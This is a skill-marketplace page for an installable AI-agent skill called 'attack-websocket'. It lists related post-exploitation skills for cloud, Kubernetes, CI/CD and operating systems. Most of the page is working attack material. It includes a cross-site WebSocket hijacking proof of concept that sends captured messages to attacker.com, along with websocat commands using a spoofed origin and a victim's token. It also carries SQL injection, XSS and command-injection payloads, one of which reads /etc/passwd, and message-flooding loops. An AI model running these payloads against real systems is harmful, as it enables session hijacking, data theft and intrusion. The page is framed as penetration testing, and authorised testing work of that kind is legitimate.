Menü
WebSocket security testing — CSWSH, message injection, auth bypass, origin validation
Mit Codex oder Claude installieren Kopieren Sie diesen Prompt, fügen Sie ihn in Codex, Claude oder einen anderen Assistant ein und lassen Sie die Skill-Seite prüfen und installieren.
Basierend auf der SOC-Berufsklassifikation
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-websocket |
| description | WebSocket security testing — CSWSH, message injection, auth bypass, origin validation |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["websocket","web","cswsh","injection","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-1385","CWE-346"] |
| chains_with | ["attack-cors"] |
| prerequisites | [] |
| severity_boost | {"attack-cors":"WebSocket + CORS bypass = cross-origin data theft via WS"} |
Exploit WebSocket implementation flaws including cross-site WebSocket hijacking (CSWSH), message injection, and authentication bypass.
# Look for WebSocket upgrade
curl -s -D- https://TARGET/ -H "Upgrade: websocket" -H "Connection: Upgrade"
# Check common paths
for path in /ws /socket /websocket /api/ws /chat /live /realtime; do
curl -s -D- "https://TARGET$path" \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" 2>/dev/null | head -1
done
Check if Origin header is validated:
# Connect with evil origin
websocat -H "Origin: https://evil.com" "wss://TARGET/ws"
# If connection succeeds with evil.com origin → CSWSH is possible
PoC HTML:
<script>
var ws = new WebSocket('wss://TARGET/ws');
ws.onmessage = function(e) {
fetch('https://attacker.com/log?data=' + btoa(e.data));
};
ws.onopen = function() {
ws.send(JSON.stringify({action: 'get_profile'}));
};
</script>
# Connect without auth token
websocat "wss://TARGET/ws"
# Test token reuse after logout
websocat -H "Cookie: session=EXPIRED_TOKEN" "wss://TARGET/ws"
# Connect with another user's token
websocat -H "Cookie: session=VICTIM_TOKEN" "wss://TARGET/ws"
# Test for SQL injection via WebSocket message
websocat "wss://TARGET/ws" <<< '{"action":"search","query":"test\" OR 1=1--"}'
# XSS via WebSocket message (if rendered in other clients)
websocat "wss://TARGET/ws" <<< '{"action":"chat","message":"<img src=x onerror=alert(1)>"}'
# Command injection
websocat "wss://TARGET/ws" <<< '{"action":"exec","cmd":"id; cat /etc/passwd"}'
# Rapid message sending
for i in $(seq 1 1000); do
echo '{"action":"ping"}'
done | websocat "wss://TARGET/ws"
# Large message
python3 -c "print('{\"data\":\"' + 'A'*1000000 + '\"}')" | websocat "wss://TARGET/ws"
| Finding | Severity |
|---|---|
| CSWSH — cross-site WebSocket hijacking | High (P2) |
| No authentication on WebSocket | High (P2) |
| SQL/command injection via WS message | Critical (P1) |
| Stored XSS via WS message | High (P2) |
| Session not invalidated after logout | Medium (P3) |
websocat (external) — WebSocket CLI client